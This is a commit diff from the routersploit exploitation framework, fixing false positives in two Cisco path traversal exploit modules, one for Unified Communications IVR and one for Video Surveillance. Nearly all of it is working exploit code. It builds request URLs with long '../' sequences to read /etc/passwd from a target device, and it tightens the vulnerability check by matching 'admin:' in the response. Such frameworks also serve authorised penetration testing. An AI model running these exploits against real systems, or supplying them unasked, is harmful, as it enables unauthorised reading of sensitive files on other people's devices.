Skip to content

R
routersploit
Commit b9c67c24 by Marcin Bury
Options

Fixing false positives.

parent 3b71264e
Showing with 8 additions and 2 deletions
routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
...@@ -44,6 +44,7 @@ class Exploit(exploits.Exploit): ...@@ -44,6 +44,7 @@ class Exploit(exploits.Exploit):
filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
def run(self): def run(self):
if self.check():
url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename) url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
...@@ -55,6 +56,8 @@ class Exploit(exploits.Exploit): ...@@ -55,6 +56,8 @@ class Exploit(exploits.Exploit):
print_info(response.text) print_info(response.text)
else: else:
print_error("Exploit failed - could not read file") print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute @mute
def check(self): def check(self):
...@@ -64,7 +67,7 @@ class Exploit(exploits.Exploit): ...@@ -64,7 +67,7 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and len(response.text): if response.status_code == 200 and "admin:" in response.text:
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
routersploit/modules/exploits/cisco/video_surv_path_traversal.py
...@@ -36,6 +36,7 @@ class Exploit(exploits.Exploit): ...@@ -36,6 +36,7 @@ class Exploit(exploits.Exploit):
filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
def run(self): def run(self):
if self.check():
url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename) url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
...@@ -48,6 +49,8 @@ class Exploit(exploits.Exploit): ...@@ -48,6 +49,8 @@ class Exploit(exploits.Exploit):
print_info(response.text) print_info(response.text)
else: else:
print_error("Exploit failed - could not read file") print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - device seems to be not vulnerable")
@mute @mute
def check(self): def check(self):
...@@ -57,7 +60,7 @@ class Exploit(exploits.Exploit): ...@@ -57,7 +60,7 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and len(response.text): if response.status_code == 200 and "admin:" in response.text:
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment